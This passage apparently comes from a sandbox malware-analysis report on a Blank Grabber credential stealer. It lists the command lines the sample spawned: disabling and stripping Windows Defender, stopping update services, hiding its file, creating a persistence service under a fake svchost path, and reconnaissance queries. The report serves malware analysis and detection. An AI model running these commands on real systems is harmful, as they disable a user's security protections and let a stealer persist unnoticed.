                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:15:01:06
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:15:01:07
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:15:01:07
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:15:01:07
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic csproduct get uuid
                                                            Imagebase:0x7ff690e90000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:15:01:07
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff774ad0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:15:01:12
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:15:01:12
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                            Imagebase:0x7ff697290000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                            Imagebase:0x7ff697290000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:15:01:13
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic path win32_VideoController get name
                                                            Imagebase:0x7ff690e90000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:15:01:14
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:29
                                                            Start time:15:01:14
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:15:01:14
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic path win32_VideoController get name
                                                            Imagebase:0x7ff690e90000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:15:01:15
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:33
                                                            Start time:15:01:15
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:34
                                                            Start time:15:01:15
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:35
                                                            Start time:15:01:15
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:15:01:15
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff788110000
                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:40
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:41
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:42
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
                                                            Imagebase:0x7ff6a0500000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:46
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:47
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:48
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                            Imagebase:0x7ff60da80000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:49
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                            Imagebase:0x7ff60da80000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:50
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                            Imagebase:0x7ff60da80000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:53
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                            Imagebase:0x7ff60da80000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:54
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:55
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe delete "NPYIAYNC"
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:56
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:57
                                                            Start time:15:01:16
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:58
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto"
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:59
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:60
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                            Imagebase:0x7ff6d4590000
                                                            File size:468'120 bytes
                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:61
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:62
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7b3670000
